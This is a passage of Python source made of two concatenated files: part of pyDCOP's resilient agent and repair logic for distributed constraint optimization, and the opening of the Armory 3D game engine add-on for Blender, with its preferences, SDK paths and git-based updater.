self._idle = False
if not self._stopping.is_set():
self._handle_message(sender, dest, msg, t)
finally:
if self._run_t is not None:
e = perf_counter()
msg_duration = e - current_t
self.t_active += msg_duration
if msg_duration > 1:
self.logger.warning(
'Long message handling (%s) : %s',
msg_duration, msg)
self._process_periodic_action()
except Exception as e:
self.logger.error('Thread %s exits With error : %s \n '
'Was handling message %s ',
self.name, e, full_msg)
self.logger.error(traceback.format_exc())
if hasattr(self, 'on_fatal_error'):
self.on_fatal_error(e)
except: # catch *all* exceptions
e = sys.exc_info()[0]
self.logger.error('Thread exits With un-managed error : %s', e)
self.logger.error(e)
finally:
self._running = False
self._comm.shutdown()
self._on_stop()
self.logger.info('Thread of agent %s stopped', self._name)
def _process_periodic_action(self):
# Process periodic action. Only once the agents runs the
# computations (i.e. self._run_t is not None)
ct = perf_counter()
if self._start_t is not None :
for cb, (p, last_t) in list(self._periodic_cb.items()):
if ct - last_t >= p:
# self.logger.debug('periodic cb %s, %s %s ', cb, ct, last_t)
# Must update the cb entry BEFORE calling the cb, in case
# the cb attemps to modify (e.g. remove) it's own entry by
# calling remove_periodic_action
self._periodic_cb[cb] = (p, ct)
cb()
def is_idle(self):
"""
Indicate if the agent is idle. An idle agent is an agent which has no
pending messages to handle.
:return: True if the agent is idle, False otherwise
"""
return self._idle
def __str__(self):
return 'Agent: '+self._name
def __repr__(self):
return 'Agent: ' + self._name
def notify_wrap(f, cb):
def wrapped(*args, **kwargs):
f(*args, **kwargs)
cb(*args, **kwargs)
return wrapped
class AgentMetrics(object):
"""
AgentMetrics listen to events from the event_bus to consolidate metrics.
"""
def __init__(self):
self._computation_msg_rcv = defaultdict(lambda : (0,0))
self._computation_msg_snd = defaultdict(lambda : (0,0))
event_bus.subscribe('computations.message_rcv.*',
self._on_computation_msg_rcv)
event_bus.subscribe('computations.message_snd.*',
self._on_computation_msg_snd)
def computation_msg_rcv(self, computation: str):
return self._computation_msg_rcv[computation]
def computation_msg_snd(self, computation: str):
return self._computation_msg_snd[computation]
def _on_computation_msg_rcv(self, topic: str, msg_event):
computation, msg_size = msg_event
prev_count , prev_size = self._computation_msg_rcv[computation]
self._computation_msg_rcv[computation] = \
prev_count+1, prev_size+ msg_size
def _on_computation_msg_snd(self, topic: str, msg_event):
computation, msg_size = msg_event
prev_count , prev_size = self._computation_msg_snd[computation]
self._computation_msg_snd[computation] = \
prev_count+1, prev_size+ msg_size
from pydcop.computations_graph import constraints_hypergraph as chg
repair_algo = load_algorithm_module('mgm2')
class RepairComputationRegistration(object):
def __init__(self, computation: MessagePassingComputation,
status: str, candidate: str):
self.computation = computation
self.status = status
self.candidate = candidate
class ResilientAgent(Agent):
"""
An agent that supports resiliency by replicating it's computations.
Parameters
----------
name: str
name of the agent
comm: CommunicationLayer
object used to send and receive messages
agent_def: AgentDef
definition of this agent, optional
ui_port: int
the port on which to run the ui-server. If not given, no ui-server is
started.
replication: str
name of the replication algorithm
delay: int
An optional delay between message delivery, in second. This delay
only applies to algorithm's messages and is useful when you want to
observe (for example with the GUI) the behavior of the algorithm at
runtime.
"""
def __init__(self, name: str, comm: CommunicationLayer,
agent_def: AgentDef, replication: str, ui_port=None,
delay: float=None):
super().__init__(name, comm, agent_def, ui_port=ui_port, delay=delay)
self.replication_comp = None
if replication is not None:
self.logger.debug('deploying replication computation %s',
replication)
# DCOP computations will be added to the replication computation
# as they are deployed.
algo_module = import_module('pydcop.replication.{}'
.format(replication))
self.replication_comp = algo_module.build_replication_computation(
self, self.discovery)
# self.add_computation(self.replication_comp)
# Do not start the computation yet, the agent is not event started
self._repair_computations =\
{} # type: Dict[str, RepairComputationRegistration]
# the replication level will be set by the when requested to
# replicate, by the ReplicateComputationsMessage
self._replication_level = None
# Register notification for when all computations have been
# replicated.
self.replication_comp.replication_done = notify_wrap(
self.replication_comp.replication_done,
self._on_replication_done)
def _on_start(self):
"""
See Also
--------
Agent._on_start
Returns
-------
status
"""
self.logger.debug('Resilient agent on_start')
if not super()._on_start():
return False
if self.replication_comp is not None:
self.add_computation(self.replication_comp)
self.replication_comp.start()
return True
def _on_stop(self):
if self.replication_comp is not None:
self.replication_comp.stop()
self.discovery.unregister_computation(self.replication_comp.name)
super()._on_stop()
def add_computation(self, computation: MessagePassingComputation,
comp_name=None, publish=True):
"""
Add a computation to the agent.
See Also
--------
Agent.add_computation
Parameters
----------
computation
comp_name
publish
Returns
-------
"""
super().add_computation(computation, comp_name, publish)
if self.replication_comp is not None \
and not computation.name.startswith('_')\
and not computation.name.startswith('B'):
# FIXME : find a better way to filter out repair computation than
# looking at the first character (B).
self.replication_comp.add_computation(computation.computation_def,
computation.footprint())
def remove_computation(self, computation: str):
if self.replication_comp is not None \
and not computation.startswith('_'):
self.replication_comp.remove_computation(computation)
super().remove_computation(computation)
def replicate(self, k: int):
if self.replication_comp is not None:
self._replication_level = k
self.replication_comp.replicate(k)
def setup_repair(self, repair_info):
self.logger.info('Setup repair %s', repair_info)
# create computation for the reparation dcop
# The reparation dcop uses a dcop algorithm where computations maps to
# variable (in order to have another dcop distribution problem) and use
# binary variable for each candidate computation.
# This agent will host one variable-computation for each
# binary variable x_i^m indicating if the candidate computation x_i
# is hosted on this agent a_m. Notice that by construction,
# the agent already have a replica for all the candidates x_i.
# The reparation dcop includes several constraints and variables:
# Variables
# * one binary variable for each orphaned computation
# Constraints
# * hosted constraints : one for each candidate computation
# * capacity constraint : one for this agent
# * hosting costs constraint : one for this agent
# * communication constraint
#
# For reparation, we use a dcop algorithm where computations maps to
# variables of the dcop. On this agent, we host the computations
# corresponding to the variables representing the orphaned computation
# that could be hosted on this agent (aka candidate computation).
# Here, we use MGM
own_name = self.name
# `orphaned_binvars` is a map that contains binary variables for
# orphaned computations.
# Notice that it only contains variables for computations
# that this agents knows of, i.e. computations that could be hosted
# here (aka candidate computations) or that depends on computations
# that could be hosted here.
# There is one binary variable x_i^m for each pair (x_i, a_m),
# where x_i is an orphaned computation and a_m is an agent that could
# host x_i (i.e. has a replica of x_i).
orphaned_binvars = {} # type: Dict[Tuple, BinaryVariable]
# One binary variable x_i^m for each candidate computation x_i that
# could be hosted on this agent a_m. Computation for these variables
# will be hosted in this agent. This is a subset of orphaned_binvars.
candidate_binvars = {} # type: Dict[Tuple, BinaryVariable]
# Agent that will host the computation for each binary var.
# it is a dict { bin var name : agent_name }
# agt_hosting_binvar = {} # type: Dict[str, str]
# `hosted_cs` contains hard constraints ensuring that all candidate
# computations are hosted:
hosted_cs = {} # type: Dict[str, Constraint]
for candidate_comp, candidate_info in repair_info.items():
try:
# This computation is not hosted any more, if we had it in
# discovery, forget about it but do not publish this
# information, this agent is not responsible for updatings
# other's discovery services.
self.discovery.unregister_computation(candidate_comp,
publish=False)
except UnknownComputation:
pass
agts, _, neighbors = candidate_info
# One binary variable for each candidate agent for computation
# candidate_comp:
v_binvar = create_binary_variables(
'B', ([candidate_comp], candidate_info[0]))
# Set initial values for binary decision variable
for v in v_binvar.values():
v._intial_value = 1 if random.random() < 1/3 else 0
orphaned_binvars.update(v_binvar)
# the variable representing if the computation will be hosted on
# this agent:
candidate_binvars[(candidate_comp, own_name)] = \
v_binvar[(candidate_comp, own_name)]
# the 'hosted' hard constraint for this candidate variable:
hosted_cs[candidate_comp] =\
create_computation_hosted_constraint(candidate_comp, v_binvar)
self.logger.debug('Hosted hard constraint for computation %s : %r',
candidate_comp, hosted_cs[candidate_comp])
# One binary variable for each pair (x_j, a_n) where x_j is an
# orphaned neighbors of candidate_comp and a_n is an agent that
# could host a_n:
for neighbor in neighbors:
v_binvar = create_binary_variables(
'B', ([neighbor], neighbors[neighbor]))
orphaned_binvars.update(v_binvar)
self.logger.debug('Binary variable for reparation %s ',
orphaned_binvars)
# Agent that will host the computation for each binary var.
# it is a dict { bin var name : agent_name }
agt_hosting_binvar = {v.name: a
for (_, a), v in orphaned_binvars.items()}
self.logger.debug('Agents hosting the computations for these binary '
'variables : %s ', agt_hosting_binvar)
# The capacity (hard) constraint for this agent. This ensures that the
# capacity of the current agent will not be overflown by hosting too
# many candidate computations. This constraints depends on the binary
# variables for the candidate computations.
remaining_capacity = self.agent_def.capacity - \
sum(c.footprint() for c in self.computations())
self.logger.debug('Remaining capacity on agent %s : %s',
self.name, remaining_capacity)
def footprint_func(c_name: str):
# We have a replica for these computation, we known its footprint.
return self.replication_comp.hosted_replicas[c_name][1]
capacity_c = create_agent_capacity_constraint(
own_name, remaining_capacity, footprint_func,
candidate_binvars)
self.logger.debug('Capacity constraint for agt %s : %r',
self.name, capacity_c)
# Hosting costs constraint for this agent. This soft constraint is
# used to minimize the hosting costs on this agent ; it depends on
# the binary variables for the candidate computations.
hosting_c = create_agent_hosting_constraint(
own_name, self.agent_def.hosting_cost,
candidate_binvars)
self.logger.debug('Hosting cost constraint for agt %s : %r',
self.name, hosting_c)
# The communication constraint. This soft constraints is used to
# minimize the communication cost on this agent. As communication
# cost depends on where computation on both side of an edge are
# hosted, it also depends on the binary variables for orphaned
# computations that could not be hosted here.
def comm_func(candidate_comp: str, neighbor_comp: str, agt: str):
# returns the communication cost between the computation
# candidate_name hosted on the current agent and it's neighbor
# computation neigh_comp hosted on agt.
route_cost = self.agent_def.route(agt)
comp_def = self.replication_comp.replicas[candidate_comp]
algo = comp_def.algo.algo
algo_module = load_algorithm_module(algo)
communication_load = algo_module.communication_load
msg_load = 0
for l in comp_def.node.neighbors:
if l == neighbor_comp:
msg_load += communication_load(comp_def.node, neighbor_comp)
com_load = msg_load * route_cost
return com_load
# Now that we have the variables and constraints, we can create
# computation instances for each of the variable this agent is
# responsible for, i.e. the binary variables x_i^m that correspond to
# the candidate variable x_i (and a_m is the current agent)
self._repair_computations.clear()
algo_def = AlgorithmDef.build_with_default_param(
repair_algo.algorithm_name,
{'stop_cycle': 20, 'threshold': 0.2},
mode='min',
parameters_definitions=repair_algo.algo_params)
for (comp, agt), candidate_var in candidate_binvars.items():
self.logger.debug('Building computation for binary variable %s ('
'variable %s on %s)', candidate_var, comp, agt)
comm_c = create_agent_comp_comm_constraint(
agt, comp, repair_info[comp], comm_func, orphaned_binvars)
self.logger.debug('Communication constraint for computation %s '
'on agt %s : %r', comp, self.name, comm_c)
constraints = [comm_c, hosting_c, capacity_c, hosted_cs[comp]]
# constraints.extend(hosted_cs.values())
self.logger.debug('Got %s Constraints for var %s : %s ',
len(constraints), candidate_var, constraints)
node = chg.VariableComputationNode(candidate_var, constraints)
comp_def = ComputationDef(node, algo_def)
computation = repair_algo.build_computation(comp_def)
self.logger.debug('Computation for %s : %r ',
candidate_var, computation)
# add the computation on this agents and register the neighbors
self.add_computation(computation, publish=True)
self._repair_computations[computation.name] = \
RepairComputationRegistration(computation, 'ready', comp)
for neighbor_comp in node.neighbors:
neighbor_agt = agt_hosting_binvar[neighbor_comp]
try:
self.discovery.register_computation(
neighbor_comp, neighbor_agt,
publish=False)
except UnknownAgent:
# If we don't know this agent yet, we must perform a lookup
# and only register the computation once found.
# Note the use of partial, to force the capture of
# neighbor_comp.
def _agt_lookup_done(comp, evt, evt_agt, _):
if evt == 'agent_added':
self.discovery.register_computation(
comp, evt_agt, publish=False)
self.discovery.subscribe_agent(
neighbor_agt,
partial(_agt_lookup_done, neighbor_comp),
one_shot=True)
self.logger.info('Repair setup done one %s, %s computations created, '
'inform orchestrator', self.name,
len(candidate_binvars))
return candidate_binvars
def repair_run(self):
self.logger.info('Agent runs Repair dcop computations')
comps = list(self._repair_computations.values())
for c in comps:
c.computation.start()
c.status = 'started'
def _on_replication_done(self, replica_hosts: Dict[str, List[str]]):
"""
Called when all computations have been replicated.
This method method is meant to the overwritten in subclasses.
Parameters
----------
replica_hosts: a map { computation name -> List of agt name }
For each active computation hosted by this agent, this map
contains a list of agents that have been selected to host a
replica.
"""
self.logger.info('Replica distribution finished for agent '
'%s : %s (level requested : %s)', self.name,
replica_hosts, self._replication_level)
rep_levels = {computation: len(replica_hosts[computation])
for computation in replica_hosts}
if not all([level >= self._replication_level
for level in rep_levels.values()]):
self.logger.warning('Insufficient replication for computations: '
'%s ',
rep_levels)
def _on_computation_finished(self, computation: str,
*args, **kwargs):
self.logger.debug('Computation %s has finished', computation)
if self.replication_comp and computation in self._repair_computations:
self._on_repair_computation_finished(computation)
def _on_repair_computation_finished(self, computation: str):
repair_comp = self._repair_computations[computation]
repair_comp.status = 'finished'
# deploy the computation if it was selected during reparation:
if repair_comp.computation.current_value == 1:
self.logger.info('Reparation: computation %s selected on %s',
repair_comp.candidate, self.name)
comp_def = self.replication_comp.replicas[repair_comp.candidate]
self.logger.info('Deploying computation %s locally with '
'definition , %r', repair_comp.candidate,
comp_def)
comp = build_computation(comp_def)
self.add_computation(comp, publish=True)
else:
self.logger.info('Reparation: computation %s NOT selected on '
'%s', repair_comp.candidate, self.name)
# Remove replica: it will be re-replicated by its new host.
self.replication_comp.remove_replica(repair_comp.candidate)
if all(c.status == 'finished'
for c in self._repair_computations.values()):
selected_computations = \
[c.candidate for c in self._repair_computations.values()
if c.computation.current_value == 1]
self.logger.info('All repair computations have finished, '
'selected computation : %s',
selected_computations)
metrics = self.metrics()
print(f" metrics repair {self.name} - {metrics}")
repair_metrics = {'count_ext_msg' : {}, 'size_ext_msg': {} , 'cycles' :{}}
for c in self._repair_computations.values():
c_name = c.computation.name
if c_name in metrics['count_ext_msg']:
repair_metrics['count_ext_msg'][c_name] = metrics['count_ext_msg'][c_name]
else:
repair_metrics['count_ext_msg'][c_name] = 0
if c_name in metrics['size_ext_msg']:
repair_metrics['size_ext_msg'][c_name] = metrics['size_ext_msg'][c_name]
else:
repair_metrics['size_ext_msg'][c_name] = 0
if c_name in metrics['cycles']:
repair_metrics['cycles'][c_name] = metrics['cycles'][c_name]
else:
repair_metrics['cycles'][c_name] = 0
print(f" {self.name} : metrics after repair {repair_metrics}")
self._on_repair_done(selected_computations, repair_metrics)
if selected_computations:
self.logger.info('Re-replicate newly activated computations '
'on %s : %s , level %s', self.name,
selected_computations,
self._replication_level)
try:
self.replication_comp.replicate(self._replication_level,
selected_computations)
except UnknownComputation:
# avoid crashing if one of the neighbor comp is not repaired yet
pass
self.logger.info('Starting newly activated computations on '
'%s : %s ', self.name,
selected_computations)
for selected in selected_computations:
self.computation(selected).start()
self.computation(selected).pause()
# Remove / undeploy repair comp once repaired
for repair_comp in self._repair_computations.values():
self.remove_computation(repair_comp.computation.name)
self._repair_computations.clear()
def _on_repair_done(self, selected_computations: List[str]):
"""
Called when all repair computations have finished.
This method method is meant to the overwritten in subclasses.
"""
pass
class RepairComputation(MessagePassingComputation):
"""
"""
def __init__(self, agent: ResilientAgent):
super().__init__('_resilience_' + self.agent.name)
self.agent = agent
self.logger = logging.getLogger('pydcop.agent.repair.'+agent.name)
self._handlers = {
#'replication': self._on_replication,
# 'setup_repair': self._on_setup_repair,
# 'repair_run': self._on_repair_run,
}
@property
def type(self):
return 'replication'
def on_message(self, var_name, msg, t):
self._handlers[msg.type](msg)
def footprint(self):
return 0
def replication_done(self, replica_hosts: Dict[str, List[str]]):
"""
Called when all computations have been replicated.
The replication algorithm only selects agents to host replicas,
here we send the actual computations definitions to the agents
selected to host a replica.
We also send the obtained replication to the orchestrator.
Parameters
----------
replica_hosts: a map { computation name -> List of agt name }
For each active computation hosted by this agent, this map
contains a list of agents that have been selected to host a
replica.
"""
self.logger.info('Replica distribution finished for agent '
'%s : %s', self.name, replica_hosts)
# self.agent.on_replication_done()
# dist_msg = ComputationReplicatedMessage(self.name, replica_hosts)
# self.message_sender.post_send_to_orchestrator(dist_msg)
|
armory.py
|
# Armory 3D Engine
# https://github.com/armory3d/armory
bl_info = {
"name": "Armory",
"category": "Render",
"location": "Properties -> Render -> Armory",
"description": "3D Game Engine for Blender",
"author": "Armory3D.org",
"version": (0, 6, 0),
"blender": (2, 80, 0),
"wiki_url": "http://armory3d.org/manual",
"tracker_url": "https://github.com/armory3d/armory/issues"
}
import os
import sys
import stat
import shutil
import webbrowser
import subprocess
import threading
import bpy
import platform
from bpy.types import Operator, AddonPreferences
from bpy.props import *
from bpy.app.handlers import persistent
def get_os():
s = platform.system()
if s == 'Windows':
return 'win'
elif s == 'Darwin':
return 'mac'
else:
return 'linux'
class ArmoryAddonPreferences(AddonPreferences):
bl_idname = __name__
def sdk_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.sdk_path = bpy.path.reduce_dirs([bpy.path.abspath(self.sdk_path)])[0] + '/'
def ffmpeg_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.ffmpeg_path = bpy.path.reduce_dirs([bpy.path.abspath(self.ffmpeg_path)])[0]
def renderdoc_path_update(self, context):
if self.skip_update:
return
self.skip_update = True
self.renderdoc_path = bpy.path.reduce_dirs([bpy.path.abspath(self.renderdoc_path)])[0]
sdk_bundled = BoolProperty(name="Bundled SDK", default=True)
sdk_path = StringProperty(name="SDK Path", subtype="FILE_PATH", update=sdk_path_update, default="")
show_advanced = BoolProperty(name="Show Advanced", default=False)
player_gapi_win = EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl'),
('direct3d11', 'Direct3D11', 'direct3d11')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
player_gapi_linux = EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
player_gapi_mac = EnumProperty(
items = [('opengl', 'Auto', 'opengl'),
('opengl', 'OpenGL', 'opengl')],
name="Player Graphics API", default='opengl', description='Use this graphics API when launching the game in Krom player(F5)')
code_editor = EnumProperty(
items = [('kodestudio', 'Kode Studio', 'kodestudio'),
('default', 'System Default', 'default')],
name="Code Editor", default='kodestudio', description='Use this editor for editing scripts')
ui_scale = FloatProperty(name='UI Scale', description='Adjust UI scale for Armory tools', default=1.0, min=1.0, max=4.0)
khamake_threads = IntProperty(name='Khamake Threads', description='Allow Khamake to spawn multiple processes for faster builds', default=4, min=1)
renderdoc_path = StringProperty(name="RenderDoc Path", description="Binary path", subtype="FILE_PATH", update=renderdoc_path_update, default="")
ffmpeg_path = StringProperty(name="FFMPEG Path", description="Binary path", subtype="FILE_PATH", update=ffmpeg_path_update, default="")
save_on_build = BoolProperty(name="Save on Build", description="Save .blend", default=False)
legacy_shaders = BoolProperty(name="Legacy Shaders", description="Attempt to compile shaders runnable on older hardware", default=False)
relative_paths = BoolProperty(name="Generate Relative Paths", description="Write relative paths in khafile", default=False)
viewport_controls = EnumProperty(
items=[('qwerty', 'qwerty', 'qwerty'),
('azerty', 'azerty', 'azerty')],
name="Viewport Controls", default='qwerty', description='Viewport camera mode controls')
skip_update = BoolProperty(name="", default=False)
def draw(self, context):
self.skip_update = False
layout = self.layout
layout.label(text="Welcome to Armory! Click 'Save User Settings' at the bottom to keep Armory enabled.")
p = bundled_sdk_path()
if os.path.exists(p):
layout.prop(self, "sdk_bundled")
if not self.sdk_bundled:
layout.prop(self, "sdk_path")
else:
layout.prop(self, "sdk_path")
box = layout.box().column()
box.label(text="Armory Updater")
box.label(text="Note: Development version may run unstable!")
row = box.row(align=True)
row.alignment = 'EXPAND'
row.operator("arm_addon.install_git", icon="URL")
row.operator("arm_addon.update", icon="FILE_REFRESH")
row.operator("arm_addon.restore")
box.label(text="Please restart Blender after successful SDK update.")
layout.prop(self, "show_advanced")
if self.show_advanced:
box = layout.box().column()
box.prop(self, "player_gapi_" + get_os())
box.prop(self, "code_editor")
# box.prop(self, "kha_version")
box.prop(self, "renderdoc_path")
box.prop(self, "ffmpeg_path")
box.prop(self, "viewport_controls")
box.prop(self, "ui_scale")
box.prop(self, "khamake_threads")
box.prop(self, "save_on_build")
box.prop(self, "legacy_shaders")
box.prop(self, "relative_paths")
def bundled_sdk_path():
if get_os() == 'mac':
# SDK on MacOS is located in .app folder due to security
p = bpy.app.binary_path
if p.endswith('Contents/MacOS/blender'):
return p[:-len('Contents/MacOS/blender')] + '/armsdk/'
else:
return p[:-len('Contents/MacOS/./blender')] + '/armsdk/'
elif get_os() == 'linux':
# /blender
return bpy.app.binary_path.rsplit('/', 1)[0] + '/armsdk/'
else:
# /blender.exe
return bpy.app.binary_path.replace('\\', '/').rsplit('/', 1)[0] + '/armsdk/'
def get_fp():
if bpy.data.filepath == '':
return ''
s = bpy.data.filepath.split(os.path.sep)
s.pop()
return os.path.sep.join(s)
def get_sdk_path(context):
user_preferences = context.user_preferences
addon_prefs = user_preferences.addons["armory"].preferences
p = bundled_sdk_path()
if os.path.exists(get_fp() + '/armsdk'):
return get_fp() + '/armsdk'
elif os.path.exists(p) and addon_prefs.sdk_bundled:
return p
else:
return addon_prefs.sdk_path
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
def update_repo(done, p, n, gitn = ''):
if gitn == '':
gitn = n
if not os.path.exists(p + '/' + n + '_backup'):
os.rename(p + '/' + n, p + '/' + n + '_backup')
if os.path.exists(p + '/' + n):
shutil.rmtree(p + '/' + n, onerror=remove_readonly)
run_proc(['git', 'clone', 'https://github.com/armory3d/' + gitn, p + '/' + n, '--depth=1'], done)
def restore_repo(p, n):
if os.path.exists(p + '/' + n + '_backup'):
if os.path.exists(p + '/' + n):
shutil.rmtree(p + '/' + n, onerror=remove_readonly)
os.rename(p + '/' + n + '_backup', p + '/' + n)
class ArmAddonStartButton(bpy.types.Operator):
'''Start Armory integration'''
bl_idname = "arm_addon.start"
bl_label = "Start"
running = False
def execute(self, context):
if bpy.app.version >= (2, 80, 1):
from bl_ui import properties_render
# properties_render.RENDER_PT_render.COMPAT_ENGINES.add('ARMORY')
# properties_render.RENDER_PT_output.COMPAT_ENGINES.add('ARMORY')
properties_render.RENDER_PT_dimensions.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_world
properties_world.WORLD_PT_context_world.COMPAT_ENGINES.add('ARMORY')
properties_world.WORLD_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
properties_world.EEVEE_WORLD_PT_surface.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_material
properties_material.MATERIAL_PT_preview.COMPAT_ENGINES.add('ARMORY')
properties_material.MATERIAL_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
properties_material.EEVEE_MATERIAL_PT_context_material.COMPAT_ENGINES.add('ARMORY')
properties_material.EEVEE_MATERIAL_PT_surface.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_object
properties_object.OBJECT_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_particle
properties_particle.PARTICLE_MT_specials.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_context_particles.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_emission.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_hair_dynamics.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_cache.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_velocity.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_rotation.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_physics.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_boidbrain.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_render.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_draw.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_children.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_field_weights.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_force_fields.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_vertexgroups.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_textures.COMPAT_ENGINES.add('ARMORY')
properties_particle.PARTICLE_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_scene
properties_scene.SCENE_PT_scene.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_unit.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_color_management.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_audio.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_physics.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_rigid_body_world.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_rigid_body_cache.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_rigid_body_field_weights.COMPAT_ENGINES.add('ARMORY')
properties_scene.SCENE_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_texture
properties_texture.TEXTURE_MT_specials.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_preview.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_context.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_node.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_node_mapping.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_colors.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_clouds.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_wood.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_marble.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_magic.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_blend.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_stucci.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_image.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_image_sampling.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_image_mapping.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_musgrave.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_voronoi.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_distortednoise.COMPAT_ENGINES.add('ARMORY')
properties_texture.TextureSlotPanel.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_mapping.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_influence.COMPAT_ENGINES.add('ARMORY')
properties_texture.TEXTURE_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_armature
properties_data_armature.DATA_PT_custom_props_arm.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_bone
properties_data_bone.BONE_PT_custom_props.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_camera
properties_data_camera.DATA_PT_context_camera.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_lens.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_camera_stereoscopy.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_camera_dof.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_camera_background_image.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_camera_display.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_camera_safe_areas.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_custom_props_camera.COMPAT_ENGINES.add('ARMORY')
properties_data_camera.DATA_PT_custom_props_camera.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_curve
properties_data_curve.DATA_PT_curve_texture_space.COMPAT_ENGINES.add('ARMORY')
properties_data_curve.DATA_PT_custom_props_curve.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_light
properties_data_light.DATA_PT_context_light.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_preview.COMPAT_ENGINES.add('ARMORY')
# properties_data_light.DATA_PT_light.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_EEVEE_light.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_EEVEE_shadow.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_area.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_spot.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_falloff_curve.COMPAT_ENGINES.add('ARMORY')
properties_data_light.DATA_PT_custom_props_light.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_lattice
properties_data_lattice.DATA_PT_custom_props_lattice.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_lightprobe
properties_data_lightprobe.DATA_PT_context_lightprobe.COMPAT_ENGINES.add('ARMORY')
properties_data_lightprobe.DATA_PT_lightprobe.COMPAT_ENGINES.add('ARMORY')
properties_data_lightprobe.DATA_PT_lightprobe_parallax.COMPAT_ENGINES.add('ARMORY')
properties_data_lightprobe.DATA_PT_lightprobe_display.COMPAT_ENGINES.add('ARMORY')
from bl_ui import properties_data_mesh
properties_data_mesh.DATA_PT_context_mesh.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_normals.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_texture_space.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_vertex_groups.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_face_maps.COMPAT_ENGINES.add('ARMORY')
properties_data_mesh.DATA_PT_shape_keys.COMPAT_ENGINES.add('ARMORY')
